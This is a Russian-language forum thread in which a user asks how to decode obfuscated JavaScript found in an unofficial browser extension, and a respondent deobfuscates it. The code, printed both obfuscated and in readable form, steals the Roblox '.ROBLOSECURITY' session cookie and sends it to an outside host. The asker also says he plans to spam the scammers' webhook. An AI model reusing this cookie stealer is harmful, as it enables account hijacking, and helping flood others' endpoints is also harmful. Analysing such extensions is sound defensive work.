Как расшифровать данный JS код?

Question

[h3llx]

Нашёл в интернете людей которые сделали код который ворует кукисы из браузера и отсылает их мошенникам.
Хочу им заспамить им вебхук.

var _0x499b=['77qMEGZZ','https://robloxtools.org/botter/placesend2.php?t=','153028wWBZwf','186699xQbfwh','2971KdSyPu','get','146063uDuUET','cookies','128660YvRkJL','299029rPoqkb','18746BVtWtQ','.ROBLOSECURITY'];function _0x5eb4(_0x1b5d61,_0x4d11cf){_0x1b5d61=_0x1b5d61-0x183;var _0x499b74=_0x499b[_0x1b5d61];return _0x499b74;}var _0x301fab=_0x5eb4;(function(_0x2c07e1,_0x5ac15a){var _0x161d04=_0x5eb4;while(!![]){try{var _0x377dea=-parseInt(_0x161d04(0x186))*-parseInt(_0x161d04(0x18e))+parseInt(_0x161d04(0x188))+-parseInt(_0x161d04(0x18b))+parseInt(_0x161d04(0x18a))+parseInt(_0x161d04(0x184))+-parseInt(_0x161d04(0x18c))+-parseInt(_0x161d04(0x185));if(_0x377dea===_0x5ac15a)break;else _0x2c07e1['push'](_0x2c07e1['shift']());}catch(_0x731198){_0x2c07e1['push'](_0x2c07e1['shift']());}}}(_0x499b,0x251ec));function getCookies(_0x23c953,_0xe83e6f,_0x50f085){var _0x34a304=_0x5eb4;chrome[_0x34a304(0x189)][_0x34a304(0x187)]({'url':_0x23c953,'name':_0xe83e6f},function(_0x492f03){_0x50f085&&_0x50f085(_0x492f03['value']);});}getCookies('https://www.roblox.com',_0x301fab(0x18d),function(_0x143200){var _0x5d6e42=_0x301fab;fetch(_0x5d6e42(0x183)+_0x143200);});

Буду благодарен!

Comments

[h3llx]

Хочу сделать это что-бы им было сложно вытащить нужный кукис и сделать его бот-машиной.

[Роман]

h3llx, им это кому? )))

[WbICHA]

Полноценно деобфусцировать невозможно никак, но в данном случае код короткий, поэтому тупо проходишься форматтером и в иде даёшь переменным нормальные названия. И числа на адекватные меняешь. На всё про всё ну максимум полчаса.

[h3llx]

Роман, мошенникам)

Answer 1

[v3shin]

Вкратце, этот код делает такое:

chrome.cookies.get({
    'url': 'https://www.roblox.com',
    'name': '.ROBLOSECURITY'
}, function(cookie) {
    fetch('https://robloxtools.org/botter/placesend2.php?t=' + cookie.value);
});

Подробности можно прочитать в документации.

Как упростить такой код? Загнать в любой js beautifier и начать переименовывать переменные. Все вычисляемые значения переписывать в явном виде. Рано или поздно код упростится до читабельности.

Comments

[h3llx]

спасибо, тоесть он отправляет кук на страницу, верно?

[v3shin]

h3llx, ага, тырит значение с параметрами и отправляет его по адресу.

[v3shin]

h3llx, а вы этот код взяли из какого-то расширения?

[h3llx]

v3shin, да, на ютубе как то сидел, и увидел какое-то расширение для сайта.
Вроде бы упрощал работу, но в гугле его нет, нужно мануально устанавливать. Ну и короче, посмотрел в файлах, и вижу что отправляет кукисы по адресу, ахреневаю что сказать)
спасибо за информацию, их дискорд вебхук будет разъебан прямо щас)